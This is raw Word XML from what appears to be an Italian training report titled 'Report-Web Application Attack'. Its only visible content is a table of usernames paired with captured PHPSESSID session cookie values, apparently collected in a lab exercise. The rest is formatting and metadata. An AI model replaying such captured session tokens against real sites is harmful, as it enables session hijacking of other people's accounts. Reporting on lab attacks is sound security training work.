      <w:tr w:rsidR="00B950B5" w14:paraId="0B69E391" w14:textId="77777777" w:rsidTr="00B950B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="17FC674C" w14:textId="67A6D0FE" w:rsidR="00B950B5" w:rsidRDefault="00B950B5" w:rsidP="00DC2DDA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Smithy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="49137B31" w14:textId="6EA728ED" w:rsidR="00B950B5" w:rsidRDefault="00F33248" w:rsidP="00DC2DDA">
            <w:r w:rsidRPr="00F33248">
              <w:t>PHPSESSID=3a5649909d697474bc7bca9e14e21784</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B950B5" w14:paraId="1E8AF6B7" w14:textId="77777777" w:rsidTr="00B950B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="784BE034" w14:textId="2713535C" w:rsidR="00B950B5" w:rsidRDefault="00B950B5" w:rsidP="00DC2DDA">
            <w:r>
              <w:t>Pablo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="11E52361" w14:textId="0A27F085" w:rsidR="00B950B5" w:rsidRDefault="00506E38" w:rsidP="00DC2DDA">
            <w:r w:rsidRPr="00506E38">
              <w:t>PHPSESSID=d6c4c5de1b147883a8bd0a7cb8edf250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B950B5" w14:paraId="750C7E48" w14:textId="77777777" w:rsidTr="00B950B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="54277FFA" w14:textId="5FE853CA" w:rsidR="00B950B5" w:rsidRDefault="00B950B5" w:rsidP="00DC2DDA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Gordonb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0A658E30" w14:textId="6F259AAD" w:rsidR="00B950B5" w:rsidRDefault="00F33248" w:rsidP="00DC2DDA">
            <w:r w:rsidRPr="00F33248">
              <w:t>PHPSESSID=f03be7abb7f1a5c8c1ce87c68f9f2e90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B950B5" w14:paraId="2640B049" w14:textId="77777777" w:rsidTr="00B950B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="41DCE54A" w14:textId="1DB70C5C" w:rsidR="00B950B5" w:rsidRDefault="00B950B5" w:rsidP="00DC2DDA">
            <w:r>
              <w:t>1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="52551CDA" w14:textId="74DB2707" w:rsidR="00B950B5" w:rsidRDefault="00F33248" w:rsidP="00DC2DDA">
            <w:r w:rsidRPr="00F33248">
              <w:t>PHPSESSID=83d810b6d11a8149d2ecc543a455be26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26F11AB2" w14:textId="01B4402B" w:rsidR="00DC2DDA" w:rsidRDefault="00DC2DDA" w:rsidP="00DC2DDA"/>
    <w:p w14:paraId="7B0E7068" w14:textId="77777777" w:rsidR="000F4C7D" w:rsidRPr="00E02A28" w:rsidRDefault="000F4C7D" w:rsidP="00DC2DDA"/>
    <w:sectPr w:rsidR="000F4C7D" w:rsidRPr="00E02A28">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DC7B0" w14:textId="77777777" w:rsidR="007879CF" w:rsidRDefault="007879CF" w:rsidP="00E80B24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="59FF03CE" w14:textId="77777777" w:rsidR="007879CF" w:rsidRDefault="007879CF" w:rsidP="00E8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783223"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="33FF9C44" w14:textId="564C8A30" w:rsidR="00F912F9" w:rsidRDefault="00F912F9">
        <w:pPr>
          <w:pStyle w:val="Pidipagina"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="1B5B5EED" w14:textId="77777777" w:rsidR="00F912F9" w:rsidRDefault="00F912F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0A83C" w14:textId="77777777" w:rsidR="007879CF" w:rsidRDefault="007879CF" w:rsidP="00E80B24">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1050B3EC" w14:textId="77777777" w:rsidR="007879CF" w:rsidRDefault="007879CF" w:rsidP="00E80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4F1F" w14:textId="23E843B6" w:rsidR="00E80B24" w:rsidRDefault="00E80B24">
    <w:pPr>
      <w:pStyle w:val="Intestazione"/>
      <w:rPr>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
        <w:color w:val="4472C4" w:themeColor="accent1"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t>Report-Web Application Attack</w:t>
    </w:r>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a"/>
        <w:id w:val="78404859"/>
        <w:placeholder>
          <w:docPart w:val="764884FEB48147C0A3C591093A3F7BD4"/>
        </w:placeholder>
        <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps'" w:xpath="/ns0:CoverPageProperties[1]/ns0:PublishDate[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
        <w:date w:fullDate="2022-08-12T00:00:00Z">
          <w:dateFormat w:val="d MMMM yyyy"/>
          <w:lid w:val="it-IT"/>
          <w:storeMappedDataAs w:val="dateTime"/>
          <w:calendar w:val="gregorian"/>
        </w:date>
      </w:sdtPr>
      <w:sdtContent>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
            <w:color w:val="4472C4" w:themeColor="accent1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>12 agosto 2022</w:t>
        </w:r>
      </w:sdtContent>
    </w:sdt>
  </w:p>
  <w:p w14:paraId="73BD28EE" w14:textId="77777777" w:rsidR="00E80B24" w:rsidRDefault="00E80B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ECE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CE89372"/>
    <w:lvl w:ilvl="0" w:tplc="0410000B">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="775" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="37851A9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1656612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3D36D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA52D3E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6501B6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F57C2D82"/>
    <w:lvl w:ilvl="0" w:tplc="7DA21D6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9B6D25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62A489B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08611714">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1634021400">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2022391646">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2026318664">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="50615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08"/>
  <w:hyphenationZone w:val="283"/>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24"/>
    <w:rsid w:val="000421E1"/>
    <w:rsid w:val="000903DF"/>
    <w:rsid w:val="000F4C7D"/>
    <w:rsid w:val="0010442D"/>
    <w:rsid w:val="00115328"/>
    <w:rsid w:val="001310C3"/>
    <w:rsid w:val="00162699"/>
    <w:rsid w:val="001B20B4"/>
    <w:rsid w:val="001B66D1"/>
    <w:rsid w:val="00232873"/>
    <w:rsid w:val="00240196"/>
    <w:rsid w:val="0024293D"/>
    <w:rsid w:val="002C0453"/>
    <w:rsid w:val="002D1EF5"/>
    <w:rsid w:val="002E13B1"/>
    <w:rsid w:val="00313B46"/>
    <w:rsid w:val="00334928"/>
    <w:rsid w:val="00355934"/>
    <w:rsid w:val="00385561"/>
    <w:rsid w:val="003878BF"/>
    <w:rsid w:val="003A203C"/>
    <w:rsid w:val="003A270E"/>
    <w:rsid w:val="003A373B"/>
    <w:rsid w:val="003E728E"/>
    <w:rsid w:val="00406C78"/>
    <w:rsid w:val="004128B4"/>
    <w:rsid w:val="00433E81"/>
    <w:rsid w:val="00450574"/>
    <w:rsid w:val="004572FA"/>
    <w:rsid w:val="00481114"/>
    <w:rsid w:val="004B4A98"/>
    <w:rsid w:val="004B4F69"/>
    <w:rsid w:val="00506E38"/>
    <w:rsid w:val="005170D2"/>
    <w:rsid w:val="00575A77"/>
    <w:rsid w:val="0058656E"/>
    <w:rsid w:val="00586571"/>
    <w:rsid w:val="005F0F56"/>
    <w:rsid w:val="005F3F8B"/>
    <w:rsid w:val="0063037D"/>
    <w:rsid w:val="00646D03"/>
    <w:rsid w:val="00680AFA"/>
    <w:rsid w:val="006C15DF"/>
    <w:rsid w:val="006E435A"/>
    <w:rsid w:val="006F64B1"/>
    <w:rsid w:val="007614C5"/>
    <w:rsid w:val="007879CF"/>
    <w:rsid w:val="00797EE2"/>
    <w:rsid w:val="007A2A52"/>
    <w:rsid w:val="007C21D0"/>
    <w:rsid w:val="007F70F8"/>
    <w:rsid w:val="00802C4B"/>
    <w:rsid w:val="00810AD0"/>
    <w:rsid w:val="008433D6"/>
    <w:rsid w:val="008544A5"/>
    <w:rsid w:val="008F2B93"/>
    <w:rsid w:val="00972A15"/>
    <w:rsid w:val="00974F90"/>
    <w:rsid w:val="0099119F"/>
    <w:rsid w:val="00991B51"/>
    <w:rsid w:val="00A337F6"/>
    <w:rsid w:val="00A51D31"/>
    <w:rsid w:val="00A955DA"/>
    <w:rsid w:val="00AB6B0C"/>
    <w:rsid w:val="00AE502D"/>
    <w:rsid w:val="00AF5917"/>
    <w:rsid w:val="00B34E8B"/>
    <w:rsid w:val="00B44178"/>
    <w:rsid w:val="00B45D4C"/>
    <w:rsid w:val="00B57F20"/>
    <w:rsid w:val="00B71704"/>
    <w:rsid w:val="00B94F1F"/>
    <w:rsid w:val="00B950B5"/>
    <w:rsid w:val="00C40493"/>
    <w:rsid w:val="00C65F99"/>
    <w:rsid w:val="00C66F69"/>
    <w:rsid w:val="00CB07A4"/>
    <w:rsid w:val="00D509B0"/>
    <w:rsid w:val="00DC0D73"/>
    <w:rsid w:val="00DC2DDA"/>
    <w:rsid w:val="00E02A28"/>
    <w:rsid w:val="00E55284"/>
    <w:rsid w:val="00E616E3"/>
    <w:rsid w:val="00E77D50"/>
    <w:rsid w:val="00E80B24"/>
    <w:rsid w:val="00EF3FAD"/>
    <w:rsid w:val="00F02F59"/>
    <w:rsid w:val="00F05C0C"/>
    <w:rsid w:val="00F33248"/>
    <w:rsid w:val="00F56199"/>
    <w:rsid w:val="00F725A6"/>
    <w:rsid w:val="00F8786A"/>
    <w:rsid w:val="00F912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681A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1736A20A-EC6F-4305-BAAD-2F78414A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80B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0B24"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pidipagina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="PidipaginaCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E80B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0B24"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F56199"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grigliatabella">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="008F2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4884FEB48147C0A3C591093A3F7BD4"/>
        <w:category>
          <w:name w:val="Generale"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{0FF0BF7D-DD63-4850-9F09-103DABF356F3}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00000000" w:rsidRDefault="00E67CD1" w:rsidP="00E67CD1">
          <w:pPr>
            <w:pStyle w:val="764884FEB48147C0A3C591093A3F7BD4"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
              <w:sz w:val="27"/>
              <w:szCs w:val="27"/>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D1"/>
    <w:rsid w:val="0041240D"/>
    <w:rsid w:val="00E67C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CCEBB1DDF98411DB8835AE3DF0ECA29">
    <w:name w:val="BCCEBB1DDF98411DB8835AE3DF0ECA29"/>
    <w:rsid w:val="00E67CD1"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="764884FEB48147C0A3C591093A3F7BD4">
    <w:name w:val="764884FEB48147C0A3C591093A3F7BD4"/>
    <w:rsid w:val="00E67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2022-08-12T00:00:00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1065</Words>
  <Characters>6075</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Colaiocco</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ilaria Colaiocco</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-12T14:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-12T14:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>